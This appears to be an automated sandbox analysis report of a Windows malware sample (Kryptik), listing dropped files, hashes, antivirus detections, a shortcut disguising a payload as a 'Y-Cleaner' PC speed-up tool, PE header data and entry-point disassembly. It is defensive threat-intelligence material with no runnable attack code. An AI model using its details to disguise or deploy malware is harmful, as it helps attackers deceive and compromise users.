                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8666
                                                            Entropy (8bit):3.7032624876618576
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJwql6Ixs6Y90SU9m9gmfXopN3q89bGhsf5tCm:R6lXJZ6Ixs6YeSU9m9gmfXYGaf55
                                                            MD5:9DC650DA6FD89A33576EEB45617CE397
                                                            SHA1:CD1426FC1EECD286B60AEDEC02C6941322E3BE94
                                                            SHA-256:7055A3B534F5B1EC4A442575F302782C50E83CD761B3C6A7ED97E43568CC03D4
                                                            SHA-512:4812BD9197AD3E9C68E4A05CB7F634DA988DEBDD2D37B96843CDAF3850A7F04E8B64EF6EC1A4150D6A4E3DF23EFBD3030BF8B908AF3D0ABDE03FA96F5241BFF6
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>3152</Pi
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):5009
                                                            Entropy (8bit):4.594100313902978
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsbJg77aI9AMSWpW8VYH0Ym8M4Jmf/D6Fu+q8vD/DkFjyIOIRd:uIjf1I7mC7VwJ0KMVFhRd
                                                            MD5:B7602D15DD3ECEFA86AEF4693712F6B3
                                                            SHA1:9F96802F65054F2CF685AEEDEACD16DDAFBE9377
                                                            SHA-256:0397AB1920CFA8EE902C5B5EA43C6960951E8218AB41818C6F39D81B23E43ADC
                                                            SHA-512:C0561575C3D3CCFB9FF4698508B38F6170D685F05DFD7360341C38B8CB86B0307554EA118D94681FD4DDB5E2A019E376118FA5EFF49AA6525F0AFC7FA2DEB4D2
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534191" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:09:32 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):42544
                                                            Entropy (8bit):2.546297475764115
                                                            Encrypted:false
                                                            SSDEEP:192:3KfkjIA77bcxVXepeUOCo+QzF9yBU5H5DK5KvRIT7ngRiMxA/fxpKW1KP:aMMA77Iipebv+QzF9yBrKvm8EMWfxp7A
                                                            MD5:15378252A028EEB7FB8D4875965C7D66
                                                            SHA1:D201CFA50BB23DEB21B1047CD4829AEAA2BBCB53
                                                            SHA-256:135368F4DAD1D2A3B5A32F4F7C8E1089461D1BA2F93FD264600A11AC659B8E23
                                                            SHA-512:C116A8CBE213E80B7C0254080E06634ECAAE9E49F1E8EF20F0A2A7E0C908309BEE36AF7DE7B9E101DAC3C5C446AD37C55B85FD6B0E6279547EA12EA18D6BC6C1
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8604
                                                            Entropy (8bit):3.709692907122153
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJwd6IxkS6Y9iSUTLgmfEkApDw89b/hsfR1m:R6lXJi6IxkS6YYSUTLgmfEr/afa
                                                            MD5:FADA1E858A46E7F0DBCA507E4ECFA62F
                                                            SHA1:973A5554E29E49B46FC4FA2B3DC31AD7BBBEB86F
                                                            SHA-256:006D46B05F088125B56014473BAE01B7DBB21B486E6FF46FBB2B18C57C5E5C61
                                                            SHA-512:302438BE0A15DA046ED6EBC40A3938D8ACD100DAB350958EBE8A490D358189D5C52DE424BF613D8A5555D2AFEDEE1D8E0DFC6F63A889B32F048D92A2CD487AC1
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>3152</Pi
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4908
                                                            Entropy (8bit):4.606858083532832
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsGJg77aI9AMSWpW8VYaYm8M4Jmf/DNFs+q8nPEAFjyIOIAd:uIjfcI7mC7VCJ9WVFhAd
                                                            MD5:BD04DDF749948B80646D5196A3E3EFE9
                                                            SHA1:A148EB83D63D6D9053ECDDFD2487C16F9FEB6980
                                                            SHA-256:66C1B4561DECFE61B309FFE6033FDFCD96BA9513588747D29E9C6E51D17D3AB3
                                                            SHA-512:284EFCDCCAFCBA022AECFE083ACF3C7B780EEF84EBD878E5C8DA5C8D0CAB396C7B95C1CF4EE0F19FCB647E2C3EFDC5E1C24C520DBB66CAD5EB27467C0E286F90
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534192" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 08:08:46 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):46028
                                                            Entropy (8bit):2.4515273193268174
                                                            Encrypted:false
                                                            SSDEEP:192:ljPfkjIA77bcxVXepLFtOCo+QzDoB2uD5w5Iz42ggwErpZ9Bz1g6pMVKE1wFG:RPMMA77IipLFgv+QzDoBW2XwEFxWkwqM
                                                            MD5:3FD357CCC4C32B40F26D6E73641AEFFB
                                                            SHA1:4EDBC0C18B7F7025C82D52EA3E2258C85B54BCC3
                                                            SHA-256:DF0279E21723433A9551AE241D935A417DE4DFC8EBDACDD2A40EFAB2978B4E13
                                                            SHA-512:DC311AC8C275690FBC7415807211E5489C090CCE6B4FE3079EBA5FC4AD277BFB1FC804E5D5E9B50BE32E03B6C82E5111A1095D9CA623DCDAF51EC77692072E34
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8548
                                                            Entropy (8bit):3.710523045758048
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJwL6IxN6Y9nSU9gF9gmfPoprO89bdhsfHvfm:R6lXJ06IxN6Y9SU9m9gmfPKdafm
                                                            MD5:A7B1B4A374150083989DB346B85FF539
                                                            SHA1:FD4D65123748C0CA562601E5E8AB5CC9F810DF51
                                                            SHA-256:932768ECCE3A8EDF5481A9F550FC64917FE516601E059EF28D067A9ACCB86BC8
                                                            SHA-512:426CFD0AD085EB62013C586114B934A9CF17EDFBA20C81E059BBA96260C1D6CCD1AAF370E9DD957C631E8D8886CFEC6F7756B858AED55782FA875199EA955A67
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>3152</Pi
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4854
                                                            Entropy (8bit):4.604435780971445
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsbJg77aI9AMSWpW8VYzYm8M4Jmf/yFF+q8njkFjyIOIAd:uIjf1I7mC7V3J1hVFhAd
                                                            MD5:E5C44750A6479C14B69F609B9B1CACF0
                                                            SHA1:113FF90F0013631A12A7A6E4DEB46CC15B34CF90
                                                            SHA-256:E030FA68E00493F0F1A58777B82B7EA2B24FCBD9642F172CA59DE5237047F73D
                                                            SHA-512:B4AEF40FAA670B14B16A12EB6B707D01E7B8579F004DB54A027441F62E5169306AD5E097A202EB6BD46F02432CD34D1FAD964090079D23CFD30D44AE43C72DC2
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534191" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:V:V
                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                            Malicious:false
                                                            Preview:0
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):7
                                                            Entropy (8bit):2.2359263506290326
                                                            Encrypted:false
                                                            SSDEEP:3:xIAn:z
                                                            MD5:8FA007FA30513F97141DA3E39B658159
                                                            SHA1:AA260A3AF3BB77E2A07056AFE79F3E2B88DB7257
                                                            SHA-256:3279465B2D2603BE30735D69F5439CF95136E4725A85DC0B2EA09DB0E57B092F
                                                            SHA-512:B2AF43AF1D4AC0DF6AE71895C9BFFC5E5FDC114F385C38F76CCF79EA8796A0CDFC6B5DAA92EE1CA347A7282A7B0FC6E89863E9CF30891FBF151B88FB1E668E1F
                                                            Malicious:false
                                                            Preview:mixnine
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):21
                                                            Entropy (8bit):3.880179922675737
                                                            Encrypted:false
                                                            SSDEEP:3:gFsR0GOWW:gyRhI
                                                            MD5:408E94319D97609B8E768415873D5A14
                                                            SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                            SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                            SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                            Malicious:false
                                                            Preview:9tKiK3bsYm4fMuK47Pk3s
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1502720
                                                            Entropy (8bit):7.646111739368707
                                                            Encrypted:false
                                                            SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                            MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                            SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                            SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                            SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 75%
                                                            • Antivirus: Virustotal, Detection: 60%
                                                            Joe Sandbox View:
                                                            • Filename: nRGKqzVQRt.exe, Detection: malicious
                                                            • Filename: BDY5OFXpM9.exe, Detection: malicious
                                                            • Filename: file.exe, Detection: malicious
                                                            • Filename: univ.exe, Detection: malicious
                                                            • Filename: univ.exe, Detection: malicious
                                                            • Filename: file.exe, Detection: malicious
                                                            • Filename: file.exe, Detection: malicious
                                                            • Filename: CSBls4grBI.exe, Detection: malicious
                                                            • Filename: SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exe, Detection: malicious
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):97296
                                                            Entropy (8bit):7.9982317718947025
                                                            Encrypted:true
                                                            SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                            MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                            SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                            SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                            SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:V:V
                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                            Malicious:false
                                                            Preview:0
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):242176
                                                            Entropy (8bit):6.47050397947197
                                                            Encrypted:false
                                                            SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                            MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                            SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                            SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                            SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Virustotal, Detection: 1%
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: nRGKqzVQRt.exe, Detection: malicious
                                                            • Filename: BDY5OFXpM9.exe, Detection: malicious
                                                            • Filename: file.exe, Detection: malicious
                                                            • Filename: univ.exe, Detection: malicious
                                                            • Filename: univ.exe, Detection: malicious
                                                            • Filename: file.exe, Detection: malicious
                                                            • Filename: file.exe, Detection: malicious
                                                            • Filename: CSBls4grBI.exe, Detection: malicious
                                                            • Filename: SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exe, Detection: malicious
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:V:V
                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                            Malicious:false
                                                            Preview:0
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):242176
                                                            Entropy (8bit):6.47050397947197
                                                            Encrypted:false
                                                            SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                            MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                            SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                            SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                            SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Virustotal, Detection: 1%
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1502720
                                                            Entropy (8bit):7.646111739368707
                                                            Encrypted:false
                                                            SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                            MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                            SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                            SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                            SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 75%
                                                            • Antivirus: Virustotal, Detection: 60%
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Tue Oct 8 07:08:44 2024, mtime=Tue Oct 8 07:08:44 2024, atime=Tue Oct 8 07:08:44 2024, length=1502720, window=hide
                                                            Category:dropped
                                                            Size (bytes):2219
                                                            Entropy (8bit):3.880219765819078
                                                            Encrypted:false
                                                            SSDEEP:48:8pBi8OCnonR5AqXkQKnZgvN0LkQd9LkQFZGqLkQQyF:8pBNHnoR5DXjjN4jDjfjQy
                                                            MD5:669074E612D838379543025791588C5F
                                                            SHA1:9B8FF668CC2941E661F5917DD4303EC2AA0BB1F2
                                                            SHA-256:70EAEE7FED77FE4E01714228FF9C0C3F51470077C6150804727F7072B25D118E
                                                            SHA-512:E50158B02E62B057849FAFE48E60317F136F33542D990BAC422F710347C9216F4065F6D9C7B844DEBF0BCE8DF6BBFB7DB00CB590AFD273345D3C5BDD24294988
                                                            Malicious:false
                                                            Preview:L..................F.@.. ....@ZKY....@ZKY....@ZKY...........................B.:..DG..Yr?.D..U..k0.&...&......vk.v......\+Y...+.cKY.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^HY.@...........................%..A.p.p.D.a.t.a...B.P.1.....HY.@..Local.<......CW.^HY.@....b.....................S..L.o.c.a.l.....N.1.....HY.@..Temp..:......CW.^HY.@....l.....................b.K.T.e.m.p.....~.1.....HY.A..WWSEFY~1..f......HY.AHY.A...._.........................W.w.s.e.f.Y.v.R.A.z.Y.Z.N.1.v.3.f.r.K.w.F.A.1.w.F.8.....h.2.....HY.A .Y-CLEA~1.EXE..L......HY.AHY.A..........................Y...Y.-.C.l.e.a.n.e.r...e.x.e.......y...............-.......x............'......C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.>.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.W.w.s.e.f.Y.v.R.A.z.Y.Z.N.1.v.3.f.r.K.w.F.A.1.w.F.8.\.Y.-.C.l.e.a.n.e.r...e.x.e.J.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:MS Windows registry file, NT/2000 or above
                                                            Category:dropped
                                                            Size (bytes):1835008
                                                            Entropy (8bit):4.465761680829982
                                                            Encrypted:false
                                                            SSDEEP:6144:WIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN+dwBCswSbpx:bXD94+WlLZMM6YFH4+p
                                                            MD5:7DA52C5AE8EBF3FFF0DD0335C2F920AE
                                                            SHA1:8326D34BD9556F2E1F4296FCC185C06DBF733EFE
                                                            SHA-256:5C39B7399CF59850EFCC673AA6E89C39AF24D4A148FE1DAEC3099ECADE4A5F5B
                                                            SHA-512:81E2B796234DD1AC86955455D8F21E952C7616B865AD37784A0C3D94FA21CDE9C34ED6C7E0C36AB8AD1A28E7114C494DA2E95F42DD904E80640F85EAA3142CDD
                                                            Malicious:false
                                                            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm&..3Y
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.155292231265221
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File size:307'200 bytes
                                                            MD5:b1281430b4f8c39015940b1e5dc9d569
                                                            SHA1:58ba4506cdb786fc0b15d4717535e6463206f975
                                                            SHA256:dd8bd13e56f2c3c3b60e1c009caf5a3a66dce4eb59f32c4383a71a876dc0cb5a
                                                            SHA512:0ca0e1543617d95a0263e1c205f6bea8139db333ba7028ccd8fd50459576966f7cb5be83a336f90b381c0cee39f5bec7f4031aa3ae48438c018311c584552a91
                                                            SSDEEP:6144:B9Le1JnmHkXBRPuk1xaMGyws/IHQgoBzD3ZBzD:fC1JnAkXBBuKxaMGyw1wpXnX
                                                            TLSH:A064C02171F79D16F7F349720678A2D03A3BFA676A31C05E2140FB8F5D7A2918A61B13
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@.....................................h......................................Rich............PE..L....5.e...................
                                                            Icon Hash:c7a99a8a8651790c
                                                            Entrypoint:0x401667
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x65C835C8 [Sun Feb 11 02:49:44 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:0
                                                            File Version Major:5
                                                            File Version Minor:0
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:0
                                                            Import Hash:fbc3e75f2d9f9185d8f077824c0d6c28
                                                            Instruction
                                                            call 00007F152450C184h
                                                            jmp 00007F152450958Eh
                                                            mov edi, edi
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 00000328h
                                                            mov dword ptr [0042E3C8h], eax
                                                            mov dword ptr [0042E3C4h], ecx
                                                            mov dword ptr [0042E3C0h], edx
                                                            mov dword ptr [0042E3BCh], ebx
                                                            mov dword ptr [0042E3B8h], esi
                                                            mov dword ptr [0042E3B4h], edi
                                                            mov word ptr [0042E3E0h], ss
                                                            mov word ptr [0042E3D4h], cs
                                                            mov word ptr [0042E3B0h], ds
                                                            mov word ptr [0042E3ACh], es
                                                            mov word ptr [0042E3A8h], fs
                                                            mov word ptr [0042E3A4h], gs
                                                            pushfd
                                                            pop dword ptr [0042E3D8h]
                                                            mov eax, dword ptr [ebp+00h]
                                                            mov dword ptr [0042E3CCh], eax
                                                            mov eax, dword ptr [ebp+04h]
                                                            mov dword ptr [0042E3D0h], eax
                                                            lea eax, dword ptr [ebp+08h]
                                                            mov dword ptr [0042E3DCh], eax
                                                            mov eax, dword ptr [ebp-00000320h]
                                                            mov dword ptr [0042E318h], 00010001h
                                                            mov eax, dword ptr [0042E3D0h]
                                                            mov dword ptr [0042E2CCh], eax
                                                            mov dword ptr [0042E2C0h], C0000409h
                                                            mov dword ptr [0042E2C4h], 00000001h
                                                            mov eax, dword ptr [0042D008h]
                                                            mov dword ptr [ebp-00000328h], eax
                                                            mov eax, dword ptr [0042D00Ch]
                                                            mov dword ptr [ebp-00000324h], eax
                                                            call dword ptr [000000CCh]
                                                            Programming Language:
                                                            • [C++] VS2008 build 21022
                                                            • [ASM] VS2008 build 21022
                                                            • [ C ] VS2008 build 21022
                                                            • [IMP] VS2005 build 50727
                                                            • [RES] VS2008 build 21022
                                                            • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2c6c4 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10b000 | 0x1d348 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
